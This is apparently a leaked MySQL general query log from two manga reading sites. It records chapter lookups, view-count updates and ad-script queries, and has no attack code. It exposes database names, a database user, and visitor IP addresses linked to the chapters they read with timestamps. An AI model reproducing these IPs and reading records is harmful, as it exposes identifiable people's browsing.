and m.active = 1 330654709 Quit 330654710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654710 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='127' and m.active = 1 AND (genres like '%Romance%' OR genres like '%School%' OR genres like '%Shoujo%' OR genres like '%Slice of Life%') ORDER BY RAND() limit 10 330654711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654711 Quit 330654712 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654712 Quit 330654673 Quit 330654713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654713 Quit 330654714 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654714 Quit 330654715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654715 Quit 330654716 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654716 Quit 330654717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654717 Quit 330654718 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654718 Quit 330654719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654719 Quit 330654720 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654720 Quit 330654710 Quit 330654721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654722 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654721 Quit 330654722 Quit 330654723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654723 Quit 330654724 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654724 Quit 330654725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654725 Quit 330654726 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654726 Quit 330654727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654727 Quit 330654728 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654728 Quit 260225 19:29:36 330654729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654729 Quit 330654730 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2791' 330654730 Quit 330654731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654731 Query select * FROM chapters where id = '2791' 330654731 Quit 330654732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654732 Query select * FROM chapters where manga_id = '27' order by id desc 330654732 Quit 330654733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654733 Query Update chapters set view=view+1 where id = '2791' 330654733 Quit 330654734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654734 Query select * FROM chapters where id = '2791' 330654735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654734 Quit 330654735 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2791' 330654735 Quit 330654736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654736 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('27', '2791', '104.28.197.151', 'mangacherri.com', '2026-02-26 03:29:36', '2026-02-26 03:29:36') 330654736 Quit 330654737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654737 Query select * FROM chapter_images where chapter_id = '2791' 330654737 Quit 330654738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654738 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '27' and m.active = 1 330654738 Quit 330654739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654739 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='27' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330654740 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654741 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654740 Quit 330654741 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1854' and m.active = 1 330654741 Quit 330654742 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654742 Query select * FROM chapters where id = '1854' 330654742 Quit 330654743 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654743 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330654743 Quit 330654744 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654744 Query Update chapters set view=view+1 where id = '1854' 330654744 Quit 330654745 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654745 Query select * FROM chapters where id = '1854' 330654746 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654746 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1854' and m.active = 1 330654745 Quit 330654746 Quit 330654747 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654747 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('22', '1854', '104.249.111.25', 'mangaberri.com', '2026-02-26 03:29:36', '2026-02-26 03:29:36') 330654747 Quit 330654748 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654748 Query select * FROM chapter_images where chapter_id = '1854' 330654748 Quit 330654749 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654749 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330654749 Quit 330654750 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654750 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330654750 Quit 330654751 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654752 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654751 Quit 330654752 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654752 Quit 330654753 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654754 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654753 Quit 330654754 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654754 Quit 330654755 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654756 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654755 Quit 330654756 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654756 Quit 330654757 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654758 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654758 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654757 Quit 330654758 Quit 330654739 Quit 330654759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654759 Quit 330654760 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654760 Quit 330654761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654761 Quit 330654762 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654762 Quit 330654763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654763 Quit 330654764 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654764 Quit 330654765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654765 Quit 330654766 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654766 Quit 330654767 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654768 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654767 Quit 330654768 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6134' and m.active = 1 330654768 Quit 330654769 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654769 Query select * FROM chapters where id = '6134' 330654769 Quit 330654770 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654770 Query select * FROM chapters where manga_id = '158' order by display_priority ASC, id desc 330654770 Quit 330654771 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654771 Query Update chapters set view=view+1 where id = '6134' 330654771 Quit 330654772 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654772 Query select * FROM chapters where id = '6134' 330654773 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654772 Quit 330654773 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6134' and m.active = 1 330654773 Quit 330654774 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654774 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('158', '6134', '50.125.102.147', 'mangaberri.com', '2026-02-26 03:29:36', '2026-02-26 03:29:36') 330654774 Quit 330654775 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654775 Query select * FROM chapter_images where chapter_id = '6134' 330654775 Quit 330654776 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654776 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '158' and m.active = 1 330654776 Quit 330654777 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654777 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='158' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Mystery%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330654777 Quit 330654778 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654779 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654778 Quit 330654779 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654779 Quit 330654780 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654781 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654780 Quit 330654781 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654781 Quit 330654782 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654783 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654782 Quit 330654783 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654783 Quit 330654784 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654785 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654784 Quit 330654785 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654785 Quit 260225 19:29:37 330654786 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654787 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654786 Quit 330654787 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2843' and m.active = 1 330654787 Quit 330654788 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654788 Query select * FROM chapters where id = '2843' 330654788 Quit 330654789 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654789 Query select * FROM chapters where manga_id = '124' order by display_priority ASC, id desc 330654789 Quit 330654790 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654790 Query Update chapters set view=view+1 where id = '2843' 330654790 Quit 330654791 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654791 Query select * FROM chapters where id = '2843' 330654791 Quit 330654792 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654792 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2843' and m.active = 1 330654792 Quit 330654793 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654793 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('124', '2843', '47.79.207.247', 'mangaberri.com', '2026-02-26 03:29:37', '2026-02-26 03:29:37') 330654793 Quit 330654794 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654794 Query select * FROM chapter_images where chapter_id = '2843' 330654794 Quit 330654795 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654795 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '124' and m.active = 1 330654795 Quit 330654796 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654796 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='124' and m.active = 1 AND (genres like '%Adventure%' OR genres like '%Comedy%' OR genres like '%Drama%' OR genres like '%Fantasy%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330654796 Quit 330654797 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654798 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654797 Quit 330654798 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654798 Quit 330654799 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654800 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654800 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654799 Quit 330654800 Quit 330654801 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654802 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654801 Quit 330654802 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654802 Quit 330654803 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654804 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654803 Quit 330654804 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654804 Quit 330654805 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654806 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654805 Quit 330654806 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12' and m.active = 1 330654806 Quit 330654807 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654807 Query select * FROM chapters where id = '12' 330654807 Quit 330654808 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654808 Query select * FROM chapters where manga_id = '20' order by display_priority ASC, id desc 330654808 Quit 330654809 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654809 Query Update chapters set view=view+1 where id = '12' 330654809 Quit 330654810 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654810 Query select * FROM chapters where id = '12' 330654811 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654810 Quit 330654811 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12' and m.active = 1 330654811 Quit 330654812 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654812 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('20', '12', '198.237.34.3', 'mangaberri.com', '2026-02-26 03:29:37', '2026-02-26 03:29:37') 330654812 Quit 330654813 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654813 Query select * FROM chapter_images where chapter_id = '12' 330654813 Quit 330654814 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654814 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '20' and m.active = 1 330654814 Quit 330654815 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654815 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='20' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%' OR genres like '%Space%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330654815 Quit 330654816 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654817 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654816 Quit 330654817 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654817 Quit 330654818 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654819 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654819 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654818 Quit 330654819 Quit 330654820 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654821 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654820 Quit 330654821 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654821 Quit 330654822 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654823 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654822 Quit 330654823 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654823 Quit 330654824 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654825 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654824 Quit 330654825 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12506' 330654825 Quit 330654826 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654826 Query select * FROM chapters where id = '12506' 330654826 Quit 330654827 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654827 Query select * FROM chapters where manga_id = '239' order by id desc 330654827 Quit 330654828 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654828 Query Update chapters set view=view+1 where id = '12506' 330654828 Quit 330654829 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654829 Query select * FROM chapters where id = '12506' 330654830 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654829 Quit 330654830 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12506' 330654830 Quit 330654831 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654831 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('239', '12506', '2001:550:9801:671e:3921:2f2d:2800:604c', 'mangacherri.com', '2026-02-26 03:29:37', '2026-02-26 03:29:37') 330654831 Quit 330654832 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654832 Query select * FROM chapter_images where chapter_id = '12506' 330654832 Quit 330654833 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654833 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '239' and m.active = 1 330654833 Quit 330654834 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654834 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='239' and m.active = 1 AND (genres like '%Animals%' OR genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shounen%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330654834 Quit 330654835 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654836 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654835 Quit 330654836 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654836 Quit 330654837 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654838 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654837 Quit 330654838 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654838 Quit 330654839 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654840 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654839 Quit 330654840 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654840 Quit 330654841 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654842 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654841 Quit 330654842 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654842 Quit 260225 19:29:38 330654843 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654844 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654843 Quit 330654844 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10888' 330654844 Quit 330654845 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654845 Query select * FROM chapters where id = '10888' 330654845 Quit 330654846 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654846 Query select * FROM chapters where manga_id = '197' order by id desc 330654846 Quit 330654847 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654847 Query Update chapters set view=view+1 where id = '10888' 330654847 Quit 330654848 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654848 Query select * FROM chapters where id = '10888' 330654848 Quit 330654849 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654849 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10888' 330654849 Quit 330654850 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654850 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '10888', '2001:16a2:c2f1:2fe2:af3f:171c:c7a5:4d8a', 'mangacherri.com', '2026-02-26 03:29:38', '2026-02-26 03:29:38') 330654850 Quit 330654851 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654851 Query select * FROM chapter_images where chapter_id = '10888' 330654851 Quit 330654852 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654852 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330654852 Quit 330654853 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654853 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330654853 Quit 330654854 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654855 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654855 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654854 Quit 330654855 Quit 330654856 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654857 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654856 Quit 330654857 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654857 Quit 330654858 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654859 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654859 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654858 Quit 330654859 Quit 330654860 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654861 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654860 Quit 330654861 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654861 Quit 330654862 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654863 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654862 Quit 330654863 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '11900' 330654863 Quit 330654864 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654864 Query select * FROM chapters where id = '11900' 330654864 Quit 330654865 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654865 Query select * FROM chapters where manga_id = '22' order by id desc 330654865 Quit 330654866 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654866 Query 